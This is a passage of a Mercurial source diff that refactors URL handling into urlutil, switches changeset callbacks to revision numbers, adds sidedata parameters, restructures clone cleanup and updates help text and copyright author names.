bundlecaps=bundlecaps, matcher=matcher + repo, + outgoing, + version, + source, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, ) part = bundler.newpart(b'changegroup', data=cgstream) @@ -2369,6 +2430,8 @@ if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + sidedata = bundle2.format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', sidedata) if ( kwargs.get('narrow', False) @@ -2393,7 +2456,7 @@ if not b2caps or b'bookmarks' not in b2caps: raise error.Abort(_(b'no common bookmarks exchange method')) books = bookmod.listbinbookmarks(repo) - data = bookmod.binaryencode(books) + data = bookmod.binaryencode(repo, books) if data: bundler.newpart(b'bookmarks', data=data) @@ -2585,7 +2648,7 @@ # push can proceed if not isinstance(cg, bundle2.unbundle20): # legacy case: bundle1 (changegroup 01) - txnname = b"\n".join([source, util.hidepassword(url)]) + txnname = b"\n".join([source, urlutil.hidepassword(url)]) with repo.lock(), repo.transaction(txnname) as tr: op = bundle2.applybundle(repo, cg, tr, source, url) r = bundle2.combinechangegroupresults(op) diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -22,6 +22,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, setdiscovery, ) from .interfaces import repository @@ -183,7 +184,7 @@ # TODO This is super hacky. There needs to be a storage API for this. We # also need to check for compatibility with the remote. - if b'revlogv1' not in repo.requirements: + if requirementsmod.REVLOGV1_REQUIREMENT not in repo.requirements: return False return True @@ -358,18 +359,20 @@ # Linkrev for changelog is always self. return len(cl) - def ondupchangeset(cl, node): - added.append(node) + def ondupchangeset(cl, rev): + added.append(cl.node(rev)) - def onchangeset(cl, node): + def onchangeset(cl, rev): progress.increment() - revision = cl.changelogrevision(node) - added.append(node) + revision = cl.changelogrevision(rev) + added.append(cl.node(rev)) # We need to preserve the mapping of changelog revision to node # so we can set the linkrev accordingly when manifests are added. - manifestnodes[cl.rev(node)] = revision.manifest + manifestnodes[rev] = revision.manifest + + repo.register_changeset(rev, revision) nodesbyphase = {phase: set() for phase in phases.phasenames.values()} remotebookmarks = {} @@ -414,12 +417,15 @@ mdiff.trivialdiffheader(len(data)) + data, # Flags not yet supported. 0, + # Sidedata not yet supported + {}, ) cl.addgroup( iterrevisions(), linkrev, weakref.proxy(tr), + alwayscache=True, addrevisioncb=onchangeset, duplicaterevisioncb=ondupchangeset, ) @@ -492,6 +498,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -533,8 +541,8 @@ # Chomp off header object. next(objs) - def onchangeset(cl, node): - added.append(node) + def onchangeset(cl, rev): + added.append(cl.node(rev)) rootmanifest.addgroup( iterrevisions(objs, progress), @@ -617,6 +625,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -715,6 +725,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() diff --git a/mercurial/extensions.py b/mercurial/extensions.py --- a/mercurial/extensions.py +++ b/mercurial/extensions.py @@ -1,6 +1,6 @@ # extensions.py - extension handling for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/exthelper.py b/mercurial/exthelper.py --- a/mercurial/exthelper.py +++ b/mercurial/exthelper.py @@ -46,13 +46,22 @@ # ext.py eh = exthelper.exthelper() - # As needed: + # As needed (failure to do this will mean your registration will not + # happen): cmdtable = eh.cmdtable configtable = eh.configtable filesetpredicate = eh.filesetpredicate revsetpredicate = eh.revsetpredicate templatekeyword = eh.templatekeyword + # As needed (failure to do this will mean your eh.wrap*-decorated + # functions will not wrap, and/or your eh.*setup-decorated functions + # will not execute): + uisetup = eh.finaluisetup + extsetup = eh.finalextsetup + reposetup = eh.finalreposetup + uipopulate = eh.finaluipopulate + @eh.command(b'mynewcommand', [(b'r', b'rev', [], _(b'operate on these revisions'))], _(b'-r REV...'), @@ -155,7 +164,7 @@ c(ui) def finalextsetup(self, ui): - """Method to be used as a the extension extsetup + """Method to be used as the extension extsetup The following operations belong here: @@ -201,6 +210,9 @@ example:: + # Required, otherwise your uisetup function(s) will not execute. + uisetup = eh.finaluisetup + @eh.uisetup def setupbabar(ui): print('this is uisetup!') @@ -213,6 +225,9 @@ example:: + # Required, otherwise your uipopulate function(s) will not execute. + uipopulate = eh.finaluipopulate + @eh.uipopulate def setupfoo(ui): print('this is uipopulate!') @@ -225,6 +240,9 @@ example:: + # Required, otherwise your extsetup function(s) will not execute. + extsetup = eh.finalextsetup + @eh.extsetup def setupcelestine(ui): print('this is extsetup!') @@ -237,6 +255,9 @@ example:: + # Required, otherwise your reposetup function(s) will not execute. + reposetup = eh.finalreposetup + @eh.reposetup def setupzephir(ui, repo): print('this is reposetup!') @@ -258,6 +279,11 @@ example:: + # Required if `extension` is not provided + uisetup = eh.finaluisetup + # Required if `extension` is provided + extsetup = eh.finalextsetup + @eh.wrapcommand(b'summary') def wrapsummary(orig, ui, repo, *args, **kwargs): ui.note(b'Barry!') @@ -298,8 +324,11 @@ example:: - @eh.function(discovery, b'checkheads') - def wrapfunction(orig, *args, **kwargs): + # Required, otherwise the function will not be wrapped + uisetup = eh.finaluisetup + + @eh.wrapfunction(discovery, b'checkheads') + def wrapcheckheads(orig, *args, **kwargs): ui.note(b'His head smashed in and his heart cut out') return orig(*args, **kwargs) """ diff --git a/mercurial/fancyopts.py b/mercurial/fancyopts.py --- a/mercurial/fancyopts.py +++ b/mercurial/fancyopts.py @@ -1,6 +1,6 @@ # fancyopts.py - better command line parsing # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -1,6 +1,6 @@ # filelog.py - file history class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -32,6 +32,8 @@ # Full name of the user visible file, relative to the repository root. # Used by LFS. self._revlog.filename = path + self._revlog.revlog_kind = b'filelog' + self.nullid = self._revlog.nullid def __len__(self): return len(self._revlog) @@ -102,6 +104,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -109,6 +112,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addrevision( @@ -176,7 +180,8 @@ def add(self, text, meta, transaction, link, p1=None, p2=None): if meta or text.startswith(b'\1\n'): text = storageutil.packmeta(meta, text) - return self.addrevision(text, transaction, link, p1, p2) + rev = self.addrevision(text, transaction, link, p1, p2) + return self.node(rev) def renamed(self, node): return storageutil.filerevisioncopied(self, node) diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -1,6 +1,6 @@ # filemerge.py - file-level merge handling for Mercurial # -# Copyright 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -538,6 +538,25 @@ @internaltool( + b'merge3-lie-about-conflicts', + fullmerge, + b'', + precheck=_mergecheck, +) +def _imerge3alwaysgood(*args, **kwargs): + # Like merge3, but record conflicts as resolved with markers in place. + # + # This is used for `diff.merge` to show the differences between + # the auto-merge state and the committed merge state. It may be + # useful for other things. + b1, junk, b2 = _imerge3(*args, **kwargs) + # TODO is this right? I'm not sure what these return values mean, + # but as far as I can tell this will indicate to callers tha the + # merge succeeded. + return b1, False, b2 + + +@internaltool( b'mergediff', fullmerge, _( @@ -1195,7 +1214,11 @@ def hasconflictmarkers(data): return bool( - re.search(b"^(<<<<<<< .*|=======|>>>>>>> .*)$", data, re.MULTILINE) + re.search( + br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$", + data, + re.MULTILINE, + ) ) diff --git a/mercurial/fileset.py b/mercurial/fileset.py --- a/mercurial/fileset.py +++ b/mercurial/fileset.py @@ -1,6 +1,6 @@ # fileset.py - file set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filesetlang.py b/mercurial/filesetlang.py --- a/mercurial/filesetlang.py +++ b/mercurial/filesetlang.py @@ -1,6 +1,6 @@ # filesetlang.py - parser, tokenizer and utility for file set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/formatter.py b/mercurial/formatter.py --- a/mercurial/formatter.py +++ b/mercurial/formatter.py @@ -1,6 +1,6 @@ # formatter.py - generic output formatting for mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -178,6 +178,11 @@ class baseformatter(object): + + # set to True if the formater output a strict format that does not support + # arbitrary output in the stream. + strict_format = False + def __init__(self, ui, topic, opts, converter): self._ui = ui self._topic = topic @@ -418,6 +423,9 @@ class jsonformatter(baseformatter): + + strict_format = True + def __init__(self, ui, out, topic, opts): baseformatter.__init__(self, ui, topic, opts, _nullconverter) self._out = out diff --git a/mercurial/grep.py b/mercurial/grep.py --- a/mercurial/grep.py +++ b/mercurial/grep.py @@ -1,6 +1,6 @@ # grep.py - logic for history walk and grep # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hbisect.py b/mercurial/hbisect.py --- a/mercurial/hbisect.py +++ b/mercurial/hbisect.py @@ -1,6 +1,6 @@ # changelog bisection for mercurial # -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org> # # Inspired by git bisect, extension skeleton taken from mq.py. diff --git a/mercurial/help.py b/mercurial/help.py --- a/mercurial/help.py +++ b/mercurial/help.py @@ -1,6 +1,6 @@ # help.py - help data for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -829,10 +829,11 @@ def appendcmds(cmds): cmds = sorted(cmds) for c in cmds: + display_cmd = c if ui.verbose: - rst.append(b" :%s: %s\n" % (b', '.join(syns[c]), h[c])) - else: - rst.append(b' :%s: %s\n' % (c, h[c])) + display_cmd = b', '.join(syns[c]) + display_cmd = display_cmd.replace(b':', br'\:') + rst.append(b' :%s: %s\n' % (display_cmd, h[c])) if name in (b'shortlist', b'debug'): # List without categories. diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -910,7 +910,8 @@ Repository with this on-disk format require Mercurial version 5.4 or above. - Disabled by default. + By default this format variant is disabled if fast implementation is not + available and enabled by default if the fast implementation is available. ``use-share-safe`` Enforce "safe" behaviors for all "shares" that access this repository. @@ -966,7 +967,7 @@ On some systems, the Mercurial installation may lack `zstd` support. - Default is `zlib`. + Default is `zstd` if available, `zlib` otherwise. ``bookmarks-in-store`` Store bookmarks in .hg/store/. This means that bookmarks are shared when @@ -1150,7 +1151,7 @@ ``pretxnopen`` Run before any new repository transaction is open. The reason for the transaction will be in ``$HG_TXNNAME``, and a unique identifier for the - transaction will be in ``HG_TXNID``. A non-zero status will prevent the + transaction will be in ``$HG_TXNID``. A non-zero status will prevent the transaction from being opened. ``pretxnclose`` @@ -1159,12 +1160,13 @@ content or change it. Exit status 0 allows the commit to proceed. A non-zero status will cause the transaction to be rolled back. The reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for - the transaction will be in ``HG_TXNID``. The rest of the available data will - vary according the transaction type. New changesets will add ``$HG_NODE`` - (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last - added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and - phase changes will set ``HG_BOOKMARK_MOVED`` and ``HG_PHASES_MOVED`` to ``1`` - respectively, etc. + the transaction will be in ``$HG_TXNID``. The rest of the available data will + vary according the transaction type. Changes unbundled to the repository will + add ``$HG_URL`` and ``$HG_SOURCE``. New changesets will add ``$HG_NODE`` (the + ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added + changeset). Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and + ``$HG_PHASES_MOVED`` to ``1`` respectively. The number of new obsmarkers, if + any, will be in ``$HG_NEW_OBSMARKERS``, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository @@ -1178,7 +1180,7 @@ will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. + ``$HG_TXNID``. ``pretxnclose-phase`` Run right before a phase change is actually finalized. Any repository change @@ -1190,7 +1192,7 @@ while the previous ``$HG_OLDPHASE``. In case of new node, ``$HG_OLDPHASE`` will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. The hook is also run for newly added revisions. In this case + ``$HG_TXNID``. The hook is also run for newly added revisions. In this case the ``$HG_OLDPHASE`` entry will be empty. ``txnclose`` @@ -1701,7 +1703,8 @@ These symbolic names can be used from the command line. To pull from ``my_server``: :hg:`pull my_server`. To push to ``local_path``: -:hg:`push local_path`. +:hg:`push local_path`. You can check :hg:`help urls` for details about +valid URLs. Options containing colons (``:``) denote sub-options that can influence behavior for that specific path. Example:: @@ -1710,6 +1713,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path +Paths using the `path://otherpath` scheme will inherit the sub-options value from +the path they point to. + The following sub-options can be defined: ``pushurl`` diff --git a/mercurial/helptext/hg-ssh.8.txt b/mercurial/helptext/hg-ssh.8.txt --- a/mercurial/helptext/hg-ssh.8.txt +++ b/mercurial/helptext/hg-ssh.8.txt @@ -52,7 +52,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -64,7 +64,7 @@ Copying """"""" -Copyright (C) 2005-2016 Matt Mackall. +Copyright (C) 2005-2016 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hg.1.txt b/mercurial/helptext/hg.1.txt --- a/mercurial/helptext/hg.1.txt +++ b/mercurial/helptext/hg.1.txt @@ -6,7 +6,7 @@ Mercurial source code management system --------------------------------------- -:Author: Matt Mackall <mpm@selenic.com> +:Author: Olivia Mackall <olivia@selenic.com> :Organization: Mercurial :Manual section: 1 :Manual group: Mercurial Manual @@ -100,7 +100,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -112,7 +112,7 @@ Copying """"""" -Copyright (C) 2005-2021 Matt Mackall. +Copyright (C) 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgignore.5.txt b/mercurial/helptext/hgignore.5.txt --- a/mercurial/helptext/hgignore.5.txt +++ b/mercurial/helptext/hgignore.5.txt @@ -17,7 +17,7 @@ ====== Vadim Gelfer <vadim.gelfer@gmail.com> -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -26,7 +26,7 @@ Copying ======= This manual page is copyright 2006 Vadim Gelfer. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgrc.5.txt b/mercurial/helptext/hgrc.5.txt --- a/mercurial/helptext/hgrc.5.txt +++ b/mercurial/helptext/hgrc.5.txt @@ -25,7 +25,7 @@ ====== Bryan O'Sullivan <bos@serpentine.com>. -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -34,7 +34,7 @@ Copying ======= This manual page is copyright 2005 Bryan O'Sullivan. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/urls.txt b/mercurial/helptext/urls.txt --- a/mercurial/helptext/urls.txt +++ b/mercurial/helptext/urls.txt @@ -5,6 +5,7 @@ http://[user[:pass]@]host[:port]/[path][#revision] https://[user[:pass]@]host[:port]/[path][#revision] ssh://[user@]host[:port]/[path][#revision] + path://pathname Paths in the local filesystem can either point to Mercurial repositories or to bundle files (as created by :hg:`bundle` or @@ -64,3 +65,12 @@ default-push: The push command will look for a path named 'default-push', and prefer it over 'default' if both are defined. + +These alias can also be use in the `path://` scheme:: + + [paths] + alias1 = URL1 + alias2 = path://alias1 + ... + +check :hg:`help config.paths` for details about the behavior of such "sub-path". diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1,6 +1,6 @@ # hg.py - repository classes for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -32,6 +32,7 @@ error, exchange, extensions, + graphmod, httppeer, localrepo, lock, @@ -55,6 +56,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) @@ -65,7 +67,7 @@ def _local(path): - path = util.expandpath(util.urllocalpath(path)) + path = util.expandpath(urlutil.urllocalpath(path)) try: # we use os.stat() directly here instead of os.path.isfile() @@ -131,13 +133,9 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - - u = util.url(path) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - return bytes(u), (branch, branches or []) + msg = b'parseurl(...) moved to mercurial.utils.urlutil' + util.nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.parseurl(path, branches=branches) schemes = { @@ -152,7 +150,7 @@ def _peerlookup(path): - u = util.url(path) + u = urlutil.url(path) scheme = u.scheme or b'file' thing = schemes.get(scheme) or schemes[b'file'] try: @@ -177,7 +175,7 @@ def openpath(ui, path, sendaccept=True): '''open path with open if local, url.open if remote''' - pathurl = util.url(path, parsequery=False, parsefragment=False) + pathurl = urlutil.url(path, parsequery=False, parsefragment=False) if pathurl.islocal(): return util.posixfile(pathurl.localpath(), b'rb') else: @@ -265,7 +263,7 @@ >>> defaultdest(b'http://example.org/foo/') 'foo' """ - path = util.url(source).path + path = urlutil.url(source).path if not path: return b'' return os.path.basename(os.path.normpath(path)) @@ -284,7 +282,7 @@ # the sharedpath always ends in the .hg; we want the path to the repo source = repo.vfs.split(repo.sharedpath)[0] - srcurl, branches = parseurl(source) + srcurl, branches = urlutil.parseurl(source) srcrepo = repository(repo.ui, srcurl) repo.srcrepo = srcrepo return srcrepo @@ -307,11 +305,10 @@ if not dest: dest = defaultdest(source) else: - dest = ui.expandpath(dest) + dest = urlutil.get_clone_path(ui, dest)[1] if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = parseurl(origsource) + origsource, source, branches = urlutil.get_clone_path(ui, source) srcrepo = repository(ui, source) rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None) else: @@ -571,7 +568,7 @@ # Resolve the value to put in [paths] section for the source. if islocal(source): - defaultpath = os.path.abspath(util.urllocalpath(source)) + defaultpath = os.path.abspath(urlutil.urllocalpath(source)) else: defaultpath = source @@ -674,150 +671,158 @@ """ if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = parseurl(origsource, branch) + src = urlutil.get_clone_path(ui, source, branch) + origsource, source, branches = src srcpeer = peer(ui, peeropts, source) else: srcpeer = source.peer() # in case we were called with a localrepo branches = (None, branch or []) origsource = source = srcpeer.url() - revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) + srclock = destlock = cleandir = None + destpeer = None + try: + revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) - if dest is None: - dest = defaultdest(source) - if dest: - ui.status(_(b"destination directory: %s\n") % dest) - else: - dest = ui.expandpath(dest) + if dest is None: + dest = defaultdest(source) + if dest: + ui.status(_(b"destination directory: %s\n") % dest) + else: + dest = urlutil.get_clone_path(ui, dest)[0] - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = urlutil.urllocalpath(dest) + source = urlutil.urllocalpath(source) - if not dest: - raise error.InputError(_(b"empty destination path is not valid")) + if not dest: + raise error.InputError(_(b"empty destination path is not valid")) - destvfs = vfsmod.vfs(dest, expandpath=True) - if destvfs.lexists(): - if not destvfs.isdir(): - raise error.InputError(_(b"destination '%s' already exists") % dest) - elif destvfs.listdir(): - raise error.InputError(_(b"destination '%s' is not empty") % dest) + destvfs = vfsmod.vfs(dest, expandpath=True) + if destvfs.lexists(): + if not destvfs.isdir(): + raise error.InputError( + _(b"destination '%s' already exists") % dest + ) + elif destvfs.listdir(): + raise error.InputError( + _(b"destination '%s' is not empty") % dest + ) - createopts = {} - narrow = False - - if storeincludepats is not None: - narrowspec.validatepatterns(storeincludepats) - narrow = True + createopts = {} + narrow = False - if storeexcludepats is not None: - narrowspec.validatepatterns(storeexcludepats) - narrow = True + if storeincludepats is not None: + narrowspec.validatepatterns(storeincludepats) + narrow = True + + if storeexcludepats is not None: + narrowspec.validatepatterns(storeexcludepats) + narrow = True - if narrow: - # Include everything by default if only exclusion patterns defined. - if storeexcludepats and not storeincludepats: - storeincludepats = {b'path:.'} + if narrow: + # Include everything by default if only exclusion patterns defined. + if storeexcludepats and not storeincludepats: + storeincludepats = {b'path:.'} - createopts[b'narrowfiles'] = True + createopts[b'narrowfiles'] = True - if depth: - createopts[b'shallowfilestore'] = True + if depth: + createopts[b'shallowfilestore'] = True - if srcpeer.capable(b'lfs-serve'): - # Repository creation honors the config if it disabled the extension, so - # we can't just announce that lfs will be enabled. This check avoids - # saying that lfs will be enabled, and then saying it's an unknown - # feature. The lfs creation option is set in either case so that a - # requirement is added. If the extension is explicitly disabled but the - # requirement is set, the clone aborts early, before transferring any - # data. - createopts[b'lfs'] = True + if srcpeer.capable(b'lfs-serve'): + # Repository creation honors the config if it disabled the extension, so + # we can't just announce that lfs will be enabled. This check avoids + # saying that lfs will be enabled, and then saying it's an unknown + # feature. The lfs creation option is set in either case so that a + # requirement is added. If the extension is explicitly disabled but the + # requirement is set, the clone aborts early, before transferring any + # data. + createopts[b'lfs'] = True - if extensions.disabled_help(b'lfs'): - ui.status( - _( - b'(remote is using large file support (lfs), but it is ' - b'explicitly disabled in the local configuration)\n' + if extensions.disabled_help(b'lfs'): + ui.status( + _( + b'(remote is using large file support (lfs), but it is ' + b'explicitly disabled in the local configuration)\n' + ) ) - ) - else: - ui.status( - _( - b'(remote is using large file support (lfs); lfs will ' - b'be enabled for this repository)\n' + else: + ui.status( + _( + b'(remote is using large file support (lfs); lfs will ' + b'be enabled for this repository)\n' + ) ) - ) - shareopts = shareopts or {} - sharepool = shareopts.get(b'pool') - sharenamemode = shareopts.get(b'mode') - if sharepool and islocal(dest): - sharepath = None - if sharenamemode == b'identity': - # Resolve the name from the initial changeset in the remote - # repository. This returns nullid when the remote is empty. It - # raises RepoLookupError if revision 0 is filtered or otherwise - # not available. If we fail to resolve, sharing is not enabled. - try: - with srcpeer.commandexecutor() as e: - rootnode = e.callcommand( - b'lookup', - { - b'key': b'0', - }, - ).result() + shareopts = shareopts or {} + sharepool = shareopts.get(b'pool') + sharenamemode = shareopts.get(b'mode') + if sharepool and islocal(dest): + sharepath = None + if sharenamemode == b'identity': + # Resolve the name from the initial changeset in the remote + # repository. This returns nullid when the remote is empty. It + # raises RepoLookupError if revision 0 is filtered or otherwise + # not available. If we fail to resolve, sharing is not enabled. + try: + with srcpeer.commandexecutor() as e: + rootnode = e.callcommand( + b'lookup', + { + b'key': b'0', + }, + ).result() - if rootnode != nullid: - sharepath = os.path.join(sharepool, hex(rootnode)) - else: + if rootnode != nullid: + sharepath = os.path.join(sharepool, hex(rootnode)) + else: + ui.status( + _( + b'(not using pooled storage: ' + b'remote appears to be empty)\n' + ) + ) + except error.RepoLookupError: ui.status( _( b'(not using pooled storage: ' - b'remote appears to be empty)\n' + b'unable to resolve identity of remote)\n' ) ) - except error.RepoLookupError: - ui.status( - _( - b'(not using pooled storage: ' - b'unable to resolve identity of remote)\n' - ) + elif sharenamemode == b'remote': + sharepath = os.path.join( + sharepool, hex(hashutil.sha1(source).digest()) + ) + else: + raise error.Abort( + _(b'unknown share naming mode: %s') % sharenamemode ) - elif sharenamemode == b'remote': - sharepath = os.path.join( - sharepool, hex(hashutil.sha1(source).digest()) - ) - else: - raise error.Abort( - _(b'unknown share naming mode: %s') % sharenamemode - ) + + # TODO this is a somewhat arbitrary restriction. + if narrow: + ui.status( + _(b'(pooled storage not supported for narrow clones)\n') + ) + sharepath = None - # TODO this is a somewhat arbitrary restriction. - if narrow: - ui.status(_(b'(pooled storage not supported for narrow clones)\n')) - sharepath = None + if sharepath: + return clonewithshare( + ui, + peeropts, + sharepath, + source, + srcpeer, + dest, + pull=pull, + rev=revs, + update=update, + stream=stream, + ) - if sharepath: - return clonewithshare( - ui, - peeropts, - sharepath, - source, - srcpeer, - dest, - pull=pull, - rev=revs, - update=update, - stream=stream, - ) + srcrepo = srcpeer.local() - srclock = destlock = cleandir = None - srcrepo = srcpeer.local() - try: abspath = origsource if islocal(origsource): - abspath = os.path.abspath(util.urllocalpath(origsource)) + abspath = os.path.abspath(urlutil.urllocalpath(origsource)) if islocal(dest): cleandir = dest @@ -931,7 +936,7 @@ local.setnarrowpats(storeincludepats, storeexcludepats) narrowspec.copytoworkingcopy(local) - u = util.url(abspath) + u = urlutil.url(abspath) defaulturl = bytes(u) local.ui.setconfig(b'paths', b'default', defaulturl, b'clone') if not stream: @@ -978,7 +983,7 @@ destrepo = destpeer.local() if destrepo: template = uimod.samplehgrcs[b'cloned'] - u = util.url(abspath) + u = urlutil.url(abspath) u.passwd = None defaulturl = bytes(u) destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl)) @@ -1055,6 +1060,8 @@ shutil.rmtree(cleandir, True) if srcpeer is not None: srcpeer.close() + if destpeer and destpeer.local() is None: + destpeer.close() return srcpeer, destpeer @@ -1114,6 +1121,7 @@ assert stats.unresolvedcount == 0 if show_stats: _showstats(repo, stats, quietempty) + return False # naming conflict in updatetotally() @@ -1246,7 +1254,14 @@ def _incoming( - displaychlist, subreporecurse, ui, repo, source, opts, buffered=False + displaychlist, + subreporecurse, + ui, + repo, + source, + opts, + buffered=False, + subpath=None, ): """ Helper for incoming / gincoming. @@ -1254,17 +1269,33 @@ (remoterepo, incomingchangesetlist, displayer) parameters, and is supposed to contain only code that can't be unified. """ - source, branches = parseurl(ui.expandpath(source), opts.get(b'branch')) + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + srcs = list(srcs) + if len(srcs) != 1: + msg = _('for now, incoming supports only a single source, %d provided') + msg %= len(srcs) + raise error.Abort(msg) + source, branches = srcs[0] + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + source = bytes(subpath) + else: + p = urlutil.url(source) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + source = bytes(p) other = peer(repo, opts, source) - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) + cleanupfn = other.close + try: + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) + revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) - if revs: - revs = [other.lookup(rev) for rev in revs] - other, chlist, cleanupfn = bundlerepo.getremotechanges( - ui, repo, other, revs, opts[b"bundle"], opts[b"force"] - ) - try: + if revs: + revs = [other.lookup(rev) for rev in revs] + other, chlist, cleanupfn = bundlerepo.getremotechanges( + ui, repo, other, revs, opts[b"bundle"], opts[b"force"] + ) + if not chlist: ui.status(_(b"no changes found\n")) return subreporecurse() @@ -1280,7 +1311,7 @@ return 0 # exit code is zero since we found incoming changes -def incoming(ui, repo, source, opts): +def incoming(ui, repo, source, opts, subpath=None): def subreporecurse(): ret = 1 if opts.get(b'subrepos'): @@ -1304,67 +1335,115 @@ count += 1 displayer.show(other[n]) - return _incoming(display, subreporecurse, ui, repo, source, opts) + return _incoming( + display, subreporecurse, ui, repo, source, opts, subpath=subpath + ) -def _outgoing(ui, repo, dest, opts): - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = path.branch, opts.get(b'branch') or [] +def 